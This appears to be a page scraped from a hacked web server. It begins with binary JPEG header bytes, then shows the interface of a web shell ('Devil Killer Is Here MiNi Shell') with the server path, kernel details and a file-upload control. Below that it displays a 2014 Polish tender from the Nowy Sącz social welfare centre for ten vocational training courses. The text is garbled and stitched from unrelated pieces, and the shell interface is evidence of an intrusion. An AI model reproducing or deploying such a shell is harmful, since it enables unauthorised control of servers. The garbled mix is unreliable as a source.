JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140707/226908-N-2014.html

<p class="kh_header"><b>Nowy Sącz: Wykonanie usług szkoleniowych - w ramach Programu Rewitalizacji Społecznej  pn. Integruj-My-się! Sądecki start w nowe możliwości realizowany w ramach Działania 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Priorytetu I Zatrudnienie i integracja społeczna Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 226908 - 2014; data zamieszczenia: 07.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Żywiecka 13, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4443623, faks 018 4435239.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.nowysacz.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług szkoleniowych - w ramach Programu Rewitalizacji Społecznej  pn. Integruj-My-się! Sądecki start w nowe możliwości realizowany w ramach Działania 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Priorytetu I Zatrudnienie i integracja społeczna Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Wykonanie usług szkoleniowych - w ramach Programu Rewitalizacji Społecznej  pn. Integruj-My-się! Sądecki start w nowe możliwości realizowany w ramach Działania 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Priorytetu I Zatrudnienie i integracja społeczna Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego składające się z 10 kursów, w całości finansowane ze środków publicznych, a mianowicie:

Kurs 1 - kurs magazyniera - operator wózków widłowych - dla 1 osoby
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kursu magazyniera - operatora wózków widłowych.
2.Kurs na magazyniera 25 godzinny praktyczno teoretycznych (gdzie 1h to 60 minut).
3.Kurs operatora wózków widłowych 55 godzinny (gdzie 1 h to 60 minut, z czego 35 godzin zajęć teoretycznych i 20 godzin praktycznych) 

Kurs 2 - kurs florystyka i bukieciarstwo - dla 3 osób
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kursu florystyka i bukieciarstwo.
2.Kurs florystyka i bukieciarstwo  60 godzinny praktyczno teoretycznych (gdzie 1h to 60 minut).

Kurs 3 - kurs obsługi komputera z pakietem Microsoft Office - dla 1 osoby
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kursu obsługi komputera z pakietem Microsoft Office.
2.Kurs obsługi komputera z pakietem Microsoft Office 50 godzinny praktyczno teoretycznych (gdzie 1h to 45 minut).
3.Wykonawca jest zobowiązany zakupić na swój koszt i przekazać nieodpłatnie uczestniczkom/uczestnikom kursu pendrive o pojemności nie mniejszej niż 8GB
4.Wykonawca jest zobowiązany zakupić na swój koszt i przekazać nieodpłatnie uczestniczkom/uczestnikom kursu książkę/podręcznik zawierający zagadnienia wymienione w minimalnym zakresie kursu.

Kurs 4 - kurs obsługi komputera w stopniu podstawowym - dla 4 osób
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kursu obsługi komputera w stopniu podstawowym.
2.Kurs obsługi komputera w stopniu podstawowym 40 godzinny praktyczno teoretycznych (gdzie 1h to 45 minut).
3.Wykonawca jest zobowiązany zakupić na swój koszt i przekazać nieodpłatnie uczestniczkom/uczestnikom kursu pendrive o pojemności nie mniejszej niż 8GB
4.Wykonawca jest zobowiązany zakupić na swój koszt i przekazać nieodpłatnie uczestniczkom/uczestnikom kursu książkę/podręcznik zawierający zagadnienia wymienione w minimalnym zakresie kursu.

Kurs 5 - kurs nowoczesny sprzedawca z obsługą kasy fiskalnej - dla 6 osób
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kursu nowoczesny sprzedawca z obsługą kasy fiskalnej.
2.Kurs nowoczesny sprzedawca 75 godzin praktyczno teoretycznych (gdzie 1h to 60 minut).
3.Kurs obsługi kasy fiskalnej 5 godzinny (gdzie 1h to 60 minut) 
4.Wykonawca zapewni uczestnikowi kursu wykonanie minimum sanitarnego z elementami HACCP i badaniami do celów sanitarno-epidemiologicznych (książeczka zdrowia).
5. Wykonawca zapewnia uczestnikom  szkolenia ubrania robocze (na wymaganych stanowiskach).

Kurs 6 - kurs kucharz małej gastronomi - dla 2 osób
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kursu kucharz małej gastronomii.
2.Kucharz małej gastronomii  80 godzinny praktyczno teoretycznych (gdzie 1h to 60 minut, 50 h praktyka w zakładzie gastronomicznym, 30 h zajęcia teoretyczne.
3.Wykonawca zapewni uczestnikowi kursu wykonanie minimum sanitarnego z elementami HACCP i badaniami do celów sanitarno-epidemiologicznych (książeczka zdrowia).
4.Wykonawca zapewnia uczestnikom  szkolenia ubrania robocze (na wymaganych stanowiskach).

Kurs 7 - kurs barman/kelner z - dla 1 osoby
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kursu barman/kelner kucharz małej gastronomii.
2.Kurs barman/kelner w tym obsługa kasy fiskalnej 55 godzinny praktyczno teoretycznych (gdzie 1h to 60 minut).
3.Obsługa kasy fiskalnej 5 godzin (gdzie 1h to 60 minut) 
4.Wykonawca zapewni uczestnikowi kursu wykonanie minimum sanitarnego z elementami HACCP i badaniami do celów sanitarno-epidemiologicznych (książeczka zdrowia).
5.Wykonawca zapewnia uczestnikom  szkolenia ubrania robocze (na wymaganych stanowiskach).

Kurs 8 - kurs fryzjerski - dla 1 osoby
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kurs fryzjerski.
2.Kurs fryzjerski 150 godzinny praktyczno teoretycznych (gdzie 1h to 45 minut) 
3.Wykonawca zapewnia uczestnikom  szkolenia ubrania robocze (na wymaganych stanowiskach).

Kurs 9 - kurs kadrowo płacowy - dla 1 osoby
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kursu kadrowo płacowego.
2.Kurs kadrowo płacowy 110 godzinny praktyczno teoretycznych (gdzie 1h to 45 minut).

Kurs 10 - kurs stylizacji paznokci manicure/tipsy - dla 1 osoby
1.Przeprowadzenie w terminie nie dłuższym niż do dnia 07.11.2014r. kursu stylizacji paznokci manicure/tipsy.
2.Kurs stylizacji paznokci manicure/tipsy 100 godzinny praktyczno teoretycznych (gdzie 1h to 60 minut, 15 godzin teoretycznych, 85 godzin praktycznych).

Wymagania dotyczące przedmiotu zamówienia:
1.Uwaga! Zamawiający podał minimalny zakres programowy, wskazując na zagadnienia, które powinny zostać uwzględnione podczas kursu.
2.Wykonawca zapewnia niezbędne badania lekarskie i inne dla uczestników kursów, które są niezbędne do udziału w szkoleniach.
3.Wykonawca kursów zapewnia:
a)programy kursów
b)kadrę dydaktyczną posiadającą kwalifikacje zawodowe odpowiednie do prowadzonego kursu
c)odpowiednie pomieszczenia wyposażone w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację szkolenia, zapewniające bezpieczne i higieniczne warunki pracy i nauki
4.Wykonawca prowadzi dokumentację z przebiegu każdego kursu w skład w której wchodzi:
a)program kursu,
b)dziennik zajęć edukacyjnych, zawierający:
-listę obecności,
-wymiar godzin zajęć edukacyjnych,
-tematy zajęć edukacyjnych,
-miejsce przeprowadzenia kursu,
c)rejestr wydanych zaświadczeń, 
5.Program kursu zawiera:
a)Nazwę formy kształcenia,
b)Czas trwania, liczbę godzin i sposób jego organizacji,
c)Cele kształcenia,
d)Plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar
e)Treści kształcenia w zakresie poszczególnych zajęć edukacyjnych
f)Wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych
6.Wykonawca zobowiązuje się do przeprowadzenia zajęć teoretycznych i praktycznych zgodnie ze sporządzonym przez Wykonawcę harmonogramem. 
7.Wykonawca zapewnia uczestnikom  szkolenia ubrania robocze (na wymaganych stanowiskach)
8.Kursy muszą być ściśle ukierunkowane na zdobycie umiejętności praktycznych, zgodnie z kierunkiem danego kursu przy uwzględnieniu nowoczesnych technologii i wymagań w zakresie kwalifikacji i umiejętności zawodowych, stawianych obecnie na rynku pracy. Po zakończenie każdego kursu Wykonawca zobowiązany jest przeprowadzić ankiety ewaluacyjne z przeprowadzonego kursu - wzór ankiety musi zostać ustalony i zaakceptowany przez Koordynatora powiatowego Programu Rewitalizacji Społecznej  pn. Integruj-My-się! Sądecki start w nowe możliwości.
9.Zamawiający wymaga, aby zajęcia były przeprowadzone przez wykładowców posiadających zasób wiedzy, doświadczenie zawodowe i przygotowanie dydaktyczne, zapewniające właściwą realizację programu kursu.
10.Wykonawca realizujący kursy zapewnia warunki zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia, oraz zapewni ubezpieczenie uczestnikom szkolenia z tytułu następstw nieszczęśliwych wypadków w trakcie kursu w kwocie nie mniejszej niż 15000,00 zł (słownie piętnaście tysięcy złoty 00/100) na każdego uczestnika kursu.
11.Wykonawca zobowiązuje się do przeprowadzenia kursu z najwyższą starannością, zgodnie z zasadami współczesnej wiedzy i obowiązującymi przepisami.
12.Miejsce i termin przeprowadzenia kursu:
a)teoretyczne i praktyczne, wykłady i ćwiczenia w granicach administracyjnych miasta Nowego Sącza,
b)kursy będą prowadzone od poniedziałku do piątku w godzinach od 800 do 2000, lecz czas zajęć w ciągu jednego dnia nie może być dłuższy niż 8 godzin zegarowych. 
13.Wykonawca zapewni każdemu uczestnikowi w każdym dniu zajęć teoretycznych dostęp do bufetu kawiarnianego składającego się z (porcje gramaturowe winny wynosić nie mniej):
a)kawa (parzona i rozpuszczalna) według bieżącego zapotrzebowania;
b)herbata (w torebkach) według bieżącego zapotrzebowania;
c)cukier według bieżącego zapotrzebowania;
d)śmietanka według bieżącego zapotrzebowania;
e)cytryna/sok cytrynowy według bieżącego zapotrzebowania;
f)sok 0,5 litra na osobę;
g)woda mineralna 0,5 litra na osobę;
h)drobne ciasteczka 150 gram na osobę;
14.Zamawiający wymaga aby Wykonawca na zajęciach teoretycznych na własny koszt przekazał każdemu uczestnikowi kursu materiały niezbędne do uczestnictwa w kursie (skrypty) odzwierciedlające tematykę kursu.
15.Zamawiający wymaga aby Wykonawca na zajęciach praktycznych na własny koszt użyczył nieodpłatnie każdemu uczestnikowi kursu materiały niezbędne do uczestnictwa w zajęciach praktycznych. 
16.Wykonawca zobowiązany jest dostarczyć Zamawiającemu w terminie 2 dni roboczych przed rozpoczęciem pierwszych zajęć harmonogram zajęć teoretycznych i praktycznych
17.Zamawiający przekaże Wykonawcy imienną listę uczestników z danymi niezbędnymi do prawidłowego wykonania zamówienia przed rozpoczęciem kursu.
18.Wykonawca zobowiązuje się udzielać na żądanie Zamawiającego informacji dotyczących stanu realizacji przedmiotu zamówienia (np. liczby osób uczestniczących w kursie, liczby osób, które zrezygnowały z udziały w kursie).
19.W celu potwierdzenia należytego wykonania przedmiotu zamówienia Wykonawca zobowiązany jest dostarczyć Zamawiającemu projekt protokołu odbioru kursu, a w nim następujące dokumenty:  
a)programy kursów - zawierające nazwę kursu, czas trwania i sposób jego organizacji, cele kształcenia, plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar, treści kształcenia w zakresie poszczególnych zajęć edukacyjnych
b)dzienniki zajęć edukacyjnych, zawierające:
-listę obecności na zajęciach teoretycznych i praktycznych, 
-wymiar godzin zajęć edukacyjnych,
-tematy zajęć edukacyjnych,
-miejsce przeprowadzenia kursu,
c)poświadczone za zgodność z oryginałem kserokopie zaświadczeń (z odpowiednim logotypem Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej) potwierdzające ukończenie kursu przez każdego uczestnika.
d)ankiety ewaluacyjne z przeprowadzonego kursu - wzór ankiety musi zostać ustalony i zaakceptowany przez Kierownika Programu Rewitalizacji Społecznej  pn. Integruj-My-się! Sądecki start w nowe możliwości realizowany w ramach Działania 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Priorytetu I Zatrudnienie i integracja społeczna Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
20.Wykonawca zobowiązany jest do promowania Unii Europejskiej (UE), Europejskiego Funduszu Społecznego (EFS) oraz Programu Operacyjnego Kapitał Ludzki (POKL) poprzez umieszczenie w miejscu odbywania warsztatów i kursów, na wszystkich materiałach związanych z przeprowadzeniem warsztatów i kursów , w szczególności na dokumentach dotyczących przebiegu realizacji warsztatów i kursów, materiałach szkoleniowych, wydawanych dyplomach, certyfikatach lub innych zaświadczeniach logo Unii Europejskiej, Europejskiego Funduszu Społecznego oraz logo Programu Operacyjnego Kapitał Ludzki oraz informacji: Program Rewitalizacji Społecznej  pn. Integruj-My-się! Sądecki start w nowe możliwości realizowany w ramach Działania 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Priorytetu I Zatrudnienie i integracja społeczna Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, użyte logotypy i sformułowania muszą być zgodne z aktualnymi Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013. Departament Zarządzania  Europejskim Funduszem Społecznym Ministerstwo Infrastruktury i Rozwoju Instytucja Zarządzająca Programem Operacyjnym Kapitał Ludzki Warszawa, 31 grudnia 2013 r
21.Wykonawca umożliwi pracownikom Zamawiającego przeprowadzenie kontroli prawidłowości realizacji kursów, a także udzieli stosownych wyjaśnień w obszarze związanym z przedmiotem zamówienia, na każde jego żądanie. 
22.Zamawiający dopuszcza wykonanie części  zamówienia przy posłużeniu się innymi podmiotami - podwykonawcami. Jeżeli Wykonawca powierzy część zamówienia podwykonawcom, to Zamawiający na podstawie art. 36b ust. 1 ustawy żąda wskazania przez wykonawcę w ofercie te części zamówienia, której wykonanie powierzy podwykonawcom.
23.Zamawiający nie dopuszcza możliwości prowadzenia kursów metodą e- learning. 
24.Realizacja zamówienia odbywać się będzie na podstawie umowy z jednym wykonawcą. 
25.Wykonawca bierze na siebie pełną odpowiedzialność za szkody wyrządzone Zamawiającemu  lub osobom trzecim w wyniku nienależytej realizacji usługi.
26.Wykonawcę obciążają wszystkie koszty związane z wykonaniem usługi.
27.Wykonanie szkoleń rozliczane będzie na podstawie pięciu faktur/rachunków, faktury/rachunki będą wystawione za zrealizowanie każdego z kursów.

Pozostałe obowiązki Wykonawcy i szczegółowy opis przedmiotu zamówienia znajduje się w Specyfikacji Istotnych Warunków Zamówienia i wzorze umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie informacji o wpisie instytucji szkoleniowej do Rejestru Instytucji Szkoleniowych na rok 2014, prowadzonego na podstawie Rozporządzenia Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych (Dz. U. z 2004 r. nr 236 poz. 2365 ze zm.) Na potwierdzenie spełnienia tego warunku Zamawiający żąda przedłożenia w ofercie aktualnego wpisu do rejestru instytucji szkoleniowych właściwego ze względu na siedzibę Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku W celu potwierdzenia spełnienia niniejszego warunku Wykonawca przedstawi Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1 - 4 ustawy, sporządzone zgodnie z wzorem stanowiącym Załącznik Nr 2 do SIWZ. Ocena spełniania niniejszego warunku dokonana zostanie w formule - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku W celu potwierdzenia spełnienia niniejszego warunku Wykonawca przedstawi Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1 - 4 ustawy, sporządzone zgodnie z wzorem stanowiącym Załącznik Nr 2 do SIWZ. Ocena spełniania niniejszego warunku dokonana zostanie w formule - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku W celu potwierdzenia spełnienia niniejszego warunku Wykonawca przedstawi Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1 - 4 ustawy, sporządzone zgodnie z wzorem stanowiącym Załącznik Nr 2 do SIWZ. Ocena spełniania niniejszego warunku dokonana zostanie w formule - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku: 
Zamawiający nie precyzuje tego warunku W celu potwierdzenia spełnienia niniejszego warunku Wykonawca przedstawi Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1 - 4 ustawy, sporządzone zgodnie z wzorem stanowiącym Załącznik Nr 2 do SIWZ. Ocena spełniania niniejszego warunku dokonana zostanie w formule - spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w zakresie rzeczowym, wysokości wynagrodzenia, terminu wykonania umowy, miejsca wykonywania umowy sposobu i zakresu wykonania umowy, osób wymienionych w umowie i wykonujących określone czynności   w razie wystąpienia, przynajmniej jednej z okoliczności wymienionych poniżej:
a)w zakresie rzeczowym, wysokości wynagrodzenia, terminu wykonania, sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie programu lub wytycznych dotyczących realizacji zamówienia
b)w zakresie rzeczowym, wysokości wynagrodzenia, terminu wykonania, w razie zmiany rozwiązania lub zmiany wysokości środków finansowych przeznaczonych na realizację zadań w roku budżetowym 
c)zmiana terminu wykonania usług wynikła ze zmian wynikłych ze zmiany Programu Rewitalizacji Społecznej  pn. Integruj-My-się! Sądecki start w nowe możliwości
d)zmiana terminu kursu proponowanego przez Wykonawcę o ile mieści się w ostatecznym terminie wykonania umowy lub miejsca wykonania umowy proponowanego przez Wykonawcę, o ile jest w Nowym Sączu, a także jeżeli zmiany wynikają z ważnych powodów.  
e)zmiany powszechnie obowiązujących przepisów prawa oraz wytycznych Instytucji Zarządzającej (Instytucja Zarządzająca dla PO KL - Minister Infrastruktury i Rozwoju) w zakresie mającym wpływ na realizację umowy;
f)zmiany danych organizacyjnych czy administracyjnych dotyczących stron  np. zmiana nr rachunku bankowego, dokumentów potwierdzających uregulowanie płatności wobec podwykonawców; zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy stronami 
g)wynikłe z nieprzewidzianych okoliczności, siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ
h)wynikłe z omyłek pisarskich, edytorskich itp.
Zmiany umowy wymagają formy pisemnej - aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.nowysacz.pl/; http://www.nowysacz.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej, ul. Żywiecka 13, 33-300 Nowy Sącz, pok. nr 120..</p>
